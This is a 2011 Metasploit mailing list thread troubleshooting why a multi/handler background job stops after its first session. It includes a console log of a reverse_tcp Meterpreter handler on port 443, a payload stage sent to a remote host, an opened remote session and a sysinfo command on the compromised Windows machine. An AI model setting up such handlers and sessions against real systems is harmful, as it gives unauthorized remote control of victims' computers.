Metasploit mailing list archives

Re: multi/handler job stops after first session even with "-j"


From: Rob Fuller <mubix () room362 com>
Date: Wed, 14 Sep 2011 01:47:52 -0400

I'm assuming you have the variable 'ExitOnSession' set to false yes?

--
Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org


On Wed, Sep 14, 2011 at 12:53 AM, Sherif El-Deeb <archeldeeb () gmail com>wrote:

Thank you for the reply,
but "exit" and "background" commands from within an active
meterpreter prompt has nothing to do with "jobs" that are running in
the background of the framework itself.

to stop a particular "job", 1 for example, we typically give the "jobs
-k 1" command, and to stop all jobs we type "jobs -K".

thanks again :) but I've been using the framework since a while now
and this issue I'm asking help with has not been like this before
"AFAIK"...


On Wed, Sep 14, 2011 at 7:34 AM, Ty Miller <tyronmiller () gmail com> wrote:
Type "background" instead of "exit"
Ty


On Wednesday, September 14, 2011, Sherif El-Deeb <archeldeeb () gmail com>
wrote:
- When I set up "exploit/multi/handler" then "exploit -j -z" as usual,
after the first session the job stops running...
- today's svn

Sherif Eldeeb
=====================
msf  exploit(handler) > version
Framework: 4.0.1-dev.13502
Console  : 4.0.1-dev.13581
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread,
process, none
   LHOST     0.0.0.0          yes       The listen address
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
msf  exploit(handler) > [*] Sending stage (752128 bytes) to 4.3.2.1
[*] Meterpreter session 1 opened (1.2.3.4:443 -> 4.3.2.1:65159) at
2011-09-14 06:29:34 +0300
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : PoorMan
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] Meterpreter session 1 closed.  Reason: User exit
msf  exploit(handler) > jobs

Jobs
====

No active jobs.

msf  exploit(handler) >
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: